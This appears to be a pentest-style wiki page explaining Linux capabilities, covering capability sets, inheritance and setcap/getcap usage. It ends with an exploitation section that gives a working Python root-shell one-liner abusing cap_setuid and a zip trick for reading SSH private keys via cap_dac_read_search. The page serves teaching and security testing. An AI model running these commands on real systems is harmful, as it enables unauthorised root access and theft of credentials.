Capabilities

Theory

Linux capabilities are a way to improve permission granularity in unix-like systems. It allows to follow the least-privilege principle by defining fine-grained permissions that can be attributed to threads and files. It works by splitting kernel calls in groups of similar functionalities.

Basic processes : Have no capabilities (file access is controlled by traditional file privileges).

(Binary) files : Can have capabilities (filesystem-dependent).

Capabilities are in separated in 5 sets :

Set

Description

Effective set

the set that will be used when doing permission check.

Permitted set

can be moved to effective set by calling capset()

Inheritable set

can be inherited from parent processes, can be moved to effective set by calling capset()

Bounding set

list of all the capabilities a process can ever receive (in its inheritable/permitted sets)

Ambiant set

passed to non-suid files without defined capabilities

Capability inheritance, capability drop

On fork() call, the child thread will have the same capabilities as the parent thread.
capset() syscall allows to
- drop any capability from any set
- move capabilities from permitted/inherited sets to effective set
If a thread calls execve() on a binary file, its capabilities will be modified following the pattern described in the man pages (see man capabilities).

Non-exhaustive capability list :

Capability

Description

CAP_AUDIT_CONTROL

Toggle kernel auditing

CAP_AUDIT_WRITE

Write to kernel audit log

CAP_CHOWN

Change file owners

CAP_SETUID/CAP_SETGID

Change UID/GID

CAP_NET_RAW

Open raw and packet sockets

CAP_NET_BIND_SERVICE

Bind a socket to Internet domain privileged ports

Practice

Setting a file's capabilities :

To change capabilities on a file, you need to type these commands as root :

# set capability to change uid to file (+ep to add to effective & permitted)
setcap cap_setuid+ep /path/to/file

# delete capabilites 
setcap -r /path/to/file

# get file(s) capabilities
getcap -r dir 2>/dev/null
getcap file

# listing & decoding a running process' capabilities
grep Cap /proc/$pid/status
capsh --decode=000001ffffffffff

Exploiting capabilities :

Empty capabilities
If a file has capabilities /path/to/file =ep it means it has all capabilities and will run as root.

To create a file with empty (=all) capabilities justsudo setcap \=ep /path/to/file

Other classic examples :

If the python binary has the cap_setuid then it becomes trivial to get a root shell :

./python -c "import os; os.setuid(0); os.system('/bin/sh')"

Arbitrary file read : zip with cap_dac_read_search

# cap_dac_read_search allows zip/tar to read any file (get ssh private key here)
zip /tmp/private_k.zip ~/.ssh/id_rsa
unzip /tmp/private_k.zip -d /tmp
# id_rsa is now readable in the unzipped folder

End notes :

When copied from one place to another, a binary will lose its capabilities. In order to keep capabilities, you can copy the file with --preserve=all option :

# to keep capabilities when copying a binary
cp --preserve=all /origin/path /dest/path

Resources

Linux Capabilities: Why They Exist and How They Workcontainersoluti

Understanding Capabilities in LinuxTinker, Tamper, Alter, Fry

Linux Privilege Escalation Using CapabilitiesRangeForce

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Last updated 3 years ago

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